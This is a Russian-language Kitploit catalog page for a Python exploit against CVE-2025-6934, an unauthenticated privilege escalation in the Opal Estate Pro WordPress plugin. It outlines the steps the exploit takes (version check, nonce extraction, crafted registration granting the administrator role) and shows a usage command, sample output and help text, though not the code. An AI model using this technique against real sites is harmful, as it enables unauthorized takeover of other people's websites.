Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6934 — Opal Estate Pro <= 1.7.5 - неаутентифицированное повышение привилегий | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-6934
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-6934

CVE-2025-6934

Opal Estate Pro <= 1.7.5 - неаутентифицированное повышение привилегий

Репозиторий
921 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-6934 - Неавторизованное повышение привилегий в Opal Estate Pro

📝 Описание

Плагин Opal Estate Pro – Property Management and Submission для WordPress, используемый темой FullHouse - Real Estate Responsive WordPress Theme, уязвим к повышению привилегий во всех версиях до 1.7.5 включительно.


  • CVE ID: CVE-2025-6934
  • CVSS Score: 9.8 (Критический)
  • Опубликовано: 30 июня 2025 г.

⚙️ Информация о скрипте

Этот эксплойт на Python автоматизирует процесс повышения привилегий:

  • Проверяет уязвимую версию плагина через readme.txt.
  • Извлекает необходимый nonce со страницы регистрации.
  • Отправляет специально сформированный запрос регистрации для получения доступа администратора.

🚀 Пример использования

root@kitploit:~
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234

📤 Пример вывода

root@kitploit:~
[•] Проверка версии плагина:
    [+] Обнаружена уязвимая версия: 1.7.5

[•] Попытка эксплойта начата
    [+] Nonce найден: 70dd70630b
    [+] HTTP статус: 200

[✔] Эксплойт успешен!
    --------------------------
    Имя пользователя : nxploitedadmin
    Email    : [email protected]
    Пароль : nxp1234
    Роль     : administrator
    --------------------------

Эксплойт от: Khaled_alenazi (Nxploited) | https://github.com/Nxploited

🛠️ Аргументы и справка

root@kitploit:~
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD

Эксплойт CVE-2025-6934 от Khaled Alenazi (Nxploited)

options:
  -h, --help              показать это справочное сообщение и выйти
  -u, --url URL           Целевой URL (например, http://site.com/path/)
  -mail, --newmail NEWMAIL
                          Email для регистрации администратора
  -password, --newpassword NEWPASSWORD
                          Пароль для нового пользователя-администратора

⚠️ Отказ от ответственности

Данный скрипт предназначен только для образовательного и авторизованного тестирования безопасности.
Неавторизованное использование этого инструмента против целей без согласия строго запрещено.


Автор: Khaled_alenazi (Nxploited)

Скачать инструмент